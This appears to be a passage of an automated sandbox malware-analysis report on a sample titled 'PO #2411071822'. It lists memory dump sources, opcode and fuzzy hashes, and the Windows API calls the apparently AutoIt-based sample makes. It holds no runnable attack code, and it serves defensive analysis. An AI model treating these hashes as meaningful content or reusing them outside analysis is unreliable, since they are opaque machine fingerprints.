                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: ComboBox$ListBox
                                                                                                              • API String ID: 3850602802-1403004172
                                                                                                              • Opcode ID: 17acf591280c70b4a39ddfd804f96e664d3af80638053daf2f153461a3ccf29b
                                                                                                              • Instruction ID: 6c1c355373c1d0f5edcede577c76aae05784a1e0327abe672245ea2abde7b4b2
                                                                                                              • Opcode Fuzzy Hash: 17acf591280c70b4a39ddfd804f96e664d3af80638053daf2f153461a3ccf29b
                                                                                                              • Instruction Fuzzy Hash: 0001A2B1A40114BBCB01E7A5CA02BFF73AD9F45344B10012AB401B72D2DBA85E4A87B9
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __calloc_crt
                                                                                                              • String ID: "J
                                                                                                              • API String ID: 3494438863-3582622258
                                                                                                              • Opcode ID: 28114113ede674fa6e296789b549a527fac72074e9ab2dcc7fd0ca2fd80a098f
                                                                                                              • Instruction ID: e22efaf91df2c1c1f32948380dd9318ca2ed380b9fe6cc3f927f19c467310b88
                                                                                                              • Opcode Fuzzy Hash: 28114113ede674fa6e296789b549a527fac72074e9ab2dcc7fd0ca2fd80a098f
                                                                                                              • Instruction Fuzzy Hash: 60F028B22182025EE7249F5EBD407A66FD4EB81724B10407FF704EA2C4E778C8415A9D
                                                                                                              APIs
                                                                                                              • LoadImageW.USER32(003E0000,00000063,00000001,00000010,00000010,00000000), ref: 003E4048
                                                                                                              • EnumResourceNamesW.KERNEL32(00000000,0000000E,004267E9,00000063,00000000,75A90280,?,?,003E3EE1,?,?,000000FF), ref: 004541B3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumImageLoadNamesResource
                                                                                                              • String ID: >>
                                                                                                              • API String ID: 1578290342-1687523914
                                                                                                              • Opcode ID: 011586deea7858851b35b54d35180e5ec14945d5dd34c2ef6da1653bb7e9545d
                                                                                                              • Instruction ID: b55531ffef0728debf694f5673f5a82b4eb7c3f285e49b6444c4f5ae16e49b82
                                                                                                              • Opcode Fuzzy Hash: 011586deea7858851b35b54d35180e5ec14945d5dd34c2ef6da1653bb7e9545d
                                                                                                              • Instruction Fuzzy Hash: 8AF09031B44360B7E2204B1ABC4AFD33EADE74ABB5F104526F615AA5E0D2F094808A98
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassName_wcscmp
                                                                                                              • String ID: #32770
                                                                                                              • API String ID: 2292705959-463685578
                                                                                                              • Opcode ID: 307dff6236a5bdf5958d995bba387e235a4e022897202881d98f6ca4360d899d
                                                                                                              • Instruction ID: a220978458d03eff10cf4f9fe95d56fefa23829eda51fa82e7f324a6e01f5f61
                                                                                                              • Opcode Fuzzy Hash: 307dff6236a5bdf5958d995bba387e235a4e022897202881d98f6ca4360d899d
                                                                                                              • Instruction Fuzzy Hash: 3DE09B77B0422527DB109A95DC45E87FFACA755764F000027F905D3141E674A60187D8
                                                                                                              APIs
                                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0041A63F
                                                                                                                • Part of subcall function 004013F1: _doexit.LIBCMT ref: 004013FB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message_doexit
                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                              • API String ID: 1993061046-4017498283
                                                                                                              • Opcode ID: fe2f468e0415cee67963df9c9030c9bf7185a2b83e96b87e28c484f4cc4d0b9b
                                                                                                              • Instruction ID: 7be7fae42a381a1c710efd51fd65fc033d971c60e1be1bfa85f568bf242982b7
                                                                                                              • Opcode Fuzzy Hash: fe2f468e0415cee67963df9c9030c9bf7185a2b83e96b87e28c484f4cc4d0b9b
                                                                                                              • Instruction Fuzzy Hash: 0DD02B313C432833D21536A96C07FD935488F05B55F180037FF0CA91D24DEAD58001ED
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 0045ACC0
                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0045AEBD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryFreeLibrarySystem
                                                                                                              • String ID: WIN_XPe
                                                                                                              • API String ID: 510247158-3257408948
                                                                                                              • Opcode ID: f8d68d4eb099fc73f8fc18c83faca376b8884393a7dca631bd37c26941b42505
                                                                                                              • Instruction ID: 376b48179ddca3e78bb820ce28e0918e25d78912834d66cf599c9a7f41e60bf8
                                                                                                              • Opcode Fuzzy Hash: f8d68d4eb099fc73f8fc18c83faca376b8884393a7dca631bd37c26941b42505
                                                                                                              • Instruction Fuzzy Hash: 7DE06570C00109DFCB12DBA5D9449EDF7B8AB48301F108196E512B2261D7B45A49DF2A
                                                                                                              APIs
                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004486E2
                                                                                                              • PostMessageW.USER32(00000000), ref: 004486E9
                                                                                                                • Part of subcall function 00427A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00427AD0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                              • String ID: Shell_TrayWnd
                                                                                                              • API String ID: 529655941-2988720461
                                                                                                              • Opcode ID: b4ae295007b4265b8dfa70d7d3920787f6fa96b8cb4592a58e4634356625064c
                                                                                                              • Instruction ID: 553542caca88da55af9993c769ab1212614c3472cc4da82b8230912bb3dee32d
                                                                                                              • Opcode Fuzzy Hash: b4ae295007b4265b8dfa70d7d3920787f6fa96b8cb4592a58e4634356625064c
                                                                                                              • Instruction Fuzzy Hash: C6D0A931B803247BE2246730AC0BFC62A089B08B21F10082AF206AA0D0C8E4A900861E
                                                                                                              APIs
                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004486A2
                                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004486B5
                                                                                                                • Part of subcall function 00427A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00427AD0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                              • String ID: Shell_TrayWnd
                                                                                                              • API String ID: 529655941-2988720461
                                                                                                              • Opcode ID: b669a44da2347a1d09be4b6d0aa1b5b8022e040d2d6e404305c7001e3515cec6
                                                                                                              • Instruction ID: 18e1b1612d9c92a89daa60bed84c400efde1565ac25ac777d9e93092a021ca2d
                                                                                                              • Opcode Fuzzy Hash: b669a44da2347a1d09be4b6d0aa1b5b8022e040d2d6e404305c7001e3515cec6
                                                                                                              • Instruction Fuzzy Hash: CAD0C975B84324B7E6646770AC0BFC66A589B04B21F11082AF64AAA1D0D9E4A9408659